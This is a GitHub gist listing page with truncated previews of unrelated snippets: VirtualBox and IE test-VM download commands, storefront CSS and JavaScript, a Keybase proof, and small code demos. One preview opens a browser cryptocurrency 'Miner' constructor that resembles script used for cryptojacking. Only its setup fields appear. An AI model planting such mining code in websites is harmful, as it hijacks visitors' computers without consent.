Skip to content

Instantly share code, notes, and snippets.

1. Download virtualbox -
curl -O -L http://download.virtualbox.org/virtualbox/4.3.26/VirtualBox-4.3.26-98988-OSX.dmg
2. Get the IE / Win 11 image (copy/paste this into terminal):
curl -O -L "https://www.modern.ie/vmdownload?browserOS=IE11-Win7&parts=4&platform=Mac&virtPlatform=virtualbox&filename=VMBuild_20141027/VirtualBox/IE11/Mac/IE11.Win7.For.Mac.VirtualBox.zip{.001,.002,.003,.004}"
<div class="section section--info">
<h2 class="section__header"></h2>
</div>
AND
.section {
display: block;
@font-face {
font-style: normal;
font-family: 'Lato';
font-weight: normal;
src: font-url('alfred_dunner/weblinc/store_front/lato/lato-regular.eot');
src: font-url('alfred_dunner/weblinc/store_front/lato/lato-regular.eot?#iefix') format('embedded-opentype'),
font-url('alfred_dunner/weblinc/store_front/lato/lato-regular.woff2') format('woff2'),
font-url('alfred_dunner/weblinc/store_front/lato/lato-regular.woff') format('woff'),
font-url('alfred_dunner/weblinc/store_front/lato/lato-regular.ttf');
}
WEBLINC.registerModule('fauxSubmit', (function () {
var grabDOMElements = function($trigger) {
//Going in and grabbing a single DOM Element.
$toggleLink = $trigger.find('.checkout-payment__tertiary-method-edit');
hideOtherArea($trigger);
bindContainerClick($toggleLink);
WORKAREA.registerModule('browseFilters', (function () {
'use strict';
var pageURL = window.location.href,
toggleFilters = function (event) {
event.preventDefault();
var $filter = $(event.currentTarget),
/**
* @param {string} s
* @return {number}
*/
var strongPasswordChecker = function(s) {
const valid = false;
const charLengthRegEx = new RegExp(/([A-Za-z0-9]){6,20}/);

Keybase proof

I hereby claim:

  • I am mupt on github.
  • I am fbonnevier (https://keybase.io/fbonnevier) on keybase.
  • I have a public key whose fingerprint is 3538 DD75 57FA B056 D607 C27E EAC2 975C C546 AEEF

To claim this, I am signing this object:

(function(window) {
"use strict";
var Miner = function(siteKey, params) {
this.params = params || {};
this._siteKey = siteKey;
this._user = null;
this._threads = [];
this._hashes = 0;
this._currentJob = null;
this._autoReconnect = true;
class Cookie {
constructor({type, flour, additives, glutenFree}) {
this.type = type;
this.flour = flour;
this.additives = additives;
this.glutenFree = glutenFree;
}
}
class CookieMonster {
# Test if a string is numeric. Used in a situation where Map contained values as Strings
#(that were both numeric and non-numeric) and required casting to integers prior to inserting into the database.
defmodule RC do
def is_numeric(str) do
case Float.parse(str) do
{_num, ""} -> true
_ -> false
end
end